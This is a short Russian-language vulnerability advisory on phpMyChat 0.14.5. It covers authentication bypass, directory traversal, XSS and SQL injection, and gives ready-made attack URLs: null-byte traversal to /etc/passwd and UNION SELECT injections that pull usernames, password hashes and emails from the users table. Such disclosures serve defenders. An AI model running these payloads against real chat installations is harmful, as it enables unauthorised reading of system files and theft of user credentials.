Программа: phpMyChat 0.14.5 

Обнаружены обход ограничений, XSS, раскрытие системной информации, раскрытие важных данных пользователей, SQL-инъекция в phpMyChat. 

1. Обход аутентификации. Удаленный атакующий может послать специально сформированный POST запрос к файлу edituser.php3, в котором значение “do_not_login” равно
“false”.

2. Обход каталога в admin.php3. Удаленный атакующий может воспользоваться этой уязвимостью и получить доступ к важной информации на системе.

3. Межсайтовое выполнение сценариев. Данные, передаваемые параметру “C” в сценарии input.php3 не проверяются, что позволяет атакующему выполнить произвольный сценарий в браузере жертвы.

4. SQL-инъекция. Различные параметры в сценарии usersL.php3 не проверяются. Удаленный атакующий может управлять SQL запросами. 

Пример: 

http://[TARGET]/chat/admin.php3?From=admin.php3&What =Body&L=russian&user=[USE R]&pswd=[YOU HASH
PASSWORD]&sheet=[FILE]%00

http://[TARGET]/chat/admin.php3?From=admin.php3&What =Body&L=russian&user=admin&pswd=[YOU HASH
PASSWORD]&sheet=/../../../../../../etc/

http://[TARGET]/chat/admin.php3?From=admin.php3&What =[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1

http://[TARGET]/chat/admin.php3?From=admin.php3&What
=/../../../../../../etc/ passwd%00&L=russian&user =admin&pswd=[YOU HASH
PASSWORD]&s

http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION
%20SELECT%20username,null,null, null%20FROM%20%20c_reg_users%20/*

http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION
%20SELECT%20password,null,null,null %20FROM%20%20c_reg_users%20/*

http://[TARGET]/chat/usersL.php3?L=russian&R ='%20UNION%20SELECT%20email,null,null,null
%20FROM%20%20c_reg_users%20/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии